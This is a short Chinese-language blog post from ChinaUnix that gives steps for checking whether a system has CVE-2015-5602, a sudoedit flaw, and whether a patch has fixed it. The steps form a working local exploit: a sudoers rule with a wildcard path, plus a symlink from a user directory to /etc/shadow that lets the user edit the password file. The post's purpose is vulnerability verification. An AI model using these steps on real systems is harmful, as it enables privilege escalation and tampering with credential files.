Chinaunix首页 | 论坛 | 博客
  • 博客访问: 438717
  • 博文数量: 99
  • 博客积分: 65
  • 博客等级: 民兵
  • 技术积分: 1012
  • 用 户 组: 普通用户
  • 注册时间: 2012-04-20 16:30
个人简介

linux kernel 工程师

文章分类

全部博文(99)

文章存档

2018年(5)

2017年(12)

2016年(27)

2015年(10)

2014年(43)

2012年(2)

我的朋友

分类: LINUX

2016-03-10 16:24:58

1. 添加一个普通用户并设置用户密码
   useradd wgh
   passwd wgh

2. 在/etc/sudoers中添加下面一句话
wgh ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt

3. ssh 登录
ssh wgh@xx.xx.xx.xx
mkdir /home/wgh/newdir

ln -s /etc/shadow /home/wgh/newdir/test.txt

4. sudoedit /home/wgh/newdir/test.txt
发现可以修改/etc/shadow文件, 则证明存在cve-2015-5602漏洞是存在的。
打上补丁后,如果发现/etc/shadow不可以修改了,则证明漏斗已经被修复。

阅读(1304) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~